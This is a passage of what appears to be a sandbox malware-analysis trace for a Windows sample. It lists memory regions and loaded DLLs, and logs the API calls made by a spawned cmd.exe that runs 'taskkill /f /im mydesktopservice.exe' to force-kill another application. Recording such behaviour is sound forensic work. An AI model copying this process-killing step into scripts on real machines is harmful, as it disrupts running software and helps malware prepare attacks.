= 2575 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2576 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2577 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2578 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2579 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2580 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2581 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2582 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2583 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2584 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2585 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2586 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2587 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2588 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2589 start_va = 0x44f0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2590 start_va = 0x46c0000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 2591 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2592 start_va = 0x47c0000 end_va = 0x4947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047c0000" filename = "" Region: id = 2593 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2594 start_va = 0x4950000 end_va = 0x4ad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 2595 start_va = 0x4ae0000 end_va = 0x5edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ae0000" filename = "" Region: id = 2596 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2597 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 2598 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2599 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2600 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 2601 start_va = 0x5ee0000 end_va = 0x6216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2602 start_va = 0x45c0000 end_va = 0x46a9fff monitored = 0 entry_point = 0x45fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2603 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 2604 start_va = 0x45c0000 end_va = 0x469ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2605 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2606 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 2607 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2608 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2609 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2610 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2611 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2612 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2613 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2614 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 2615 start_va = 0x45b0000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 2616 start_va = 0x4570000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 2617 start_va = 0x6220000 end_va = 0x625ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006220000" filename = "" Region: id = 2618 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 2619 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 2620 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2621 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2622 start_va = 0x46a0000 end_va = 0x46a5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Thread: id = 200 os_tid = 0x1038 Thread: id = 201 os_tid = 0x1020 Thread: id = 202 os_tid = 0x101c Thread: id = 203 os_tid = 0xf2c Thread: id = 204 os_tid = 0xcfc Process: id = "32" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x31286000" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im mydesktopservice.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2623 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2624 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2625 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2626 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2627 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2628 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2629 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2630 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2631 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2632 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2633 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2634 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2635 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2636 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2637 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2638 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2639 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2640 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2641 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2642 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2643 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2644 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2645 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2646 start_va = 0x590000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2647 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2648 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2649 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2650 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2651 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2652 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2653 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2654 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2655 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2656 start_va = 0x810000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 2657 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2658 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2659 start_va = 0x8e0000 end_va = 0xc16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 205 os_tid = 0x7a0 [0170.218] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0170.218] __set_app_type (_Type=0x1) [0170.218] __p__fmode () returned 0x74974d6c [0170.218] __p__commode () returned 0x74975b1c [0170.219] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0170.219] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0170.219] GetCurrentThreadId () returned 0x7a0 [0170.219] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7a0) returned 0x78 [0170.219] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0170.219] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0170.220] SetThreadUILanguage (LangId=0x0) returned 0x409 [0170.225] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0170.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0170.226] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.226] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0170.226] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0170.226] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.226] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0170.226] GetConsoleOutputCP () returned 0x1b5 [0170.227] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0170.227] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0170.227] _get_osfhandle (_FileHandle=1) returned 0x158 [0170.227] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0170.227] _get_osfhandle (_FileHandle=1) returned 0x158 [0170.227] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0170.227] _get_osfhandle (_FileHandle=0) returned 0x154 [0170.227] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0170.227] GetEnvironmentStringsW () returned 0x717cd8* [0170.228] GetProcessHeap () returned 0x710000 [0170.228] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa1a) returned 0x718700 [0170.228] FreeEnvironmentStringsA (penv="A") returned 1 [0170.228] GetProcessHeap () returned 0x710000 [0170.228] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4) returned 0x710550 [0170.228] GetEnvironmentStringsW () returned 0x717cd8* [0170.228] GetProcessHeap () returned 0x710000 [0170.228] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa1a) returned 0x719128 [0170.228] FreeEnvironmentStringsA (penv="A") returned 1 [0170.228] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0170.229] RegCloseKey (hKey=0x88) returned 0x0 [0170.229] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0170.229] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0170.230] RegCloseKey (hKey=0x88) returned 0x0 [0170.230] time (in: timer=0x0 | out: timer=0x0) returned 0x62344218 [0170.230] srand (_Seed=0x62344218) [0170.230] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mydesktopservice.exe \"" [0170.230] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mydesktopservice.exe \"" [0170.230] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0170.230] GetProcessHeap () returned 0x710000 [0170.230] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x719b50 [0170.230] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x719b58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0170.230] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0170.230] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0170.230] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0170.230] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0170.230] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0170.230] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0170.230] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0170.230] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0170.230] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0170.231] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0170.231] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0170.231] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0170.231] GetProcessHeap () returned 0x710000 [0170.231] RtlFreeHeap (HeapHandle=0x710000, Flags=0x0, BaseAddress=0x718700) returned 1 [0170.231] 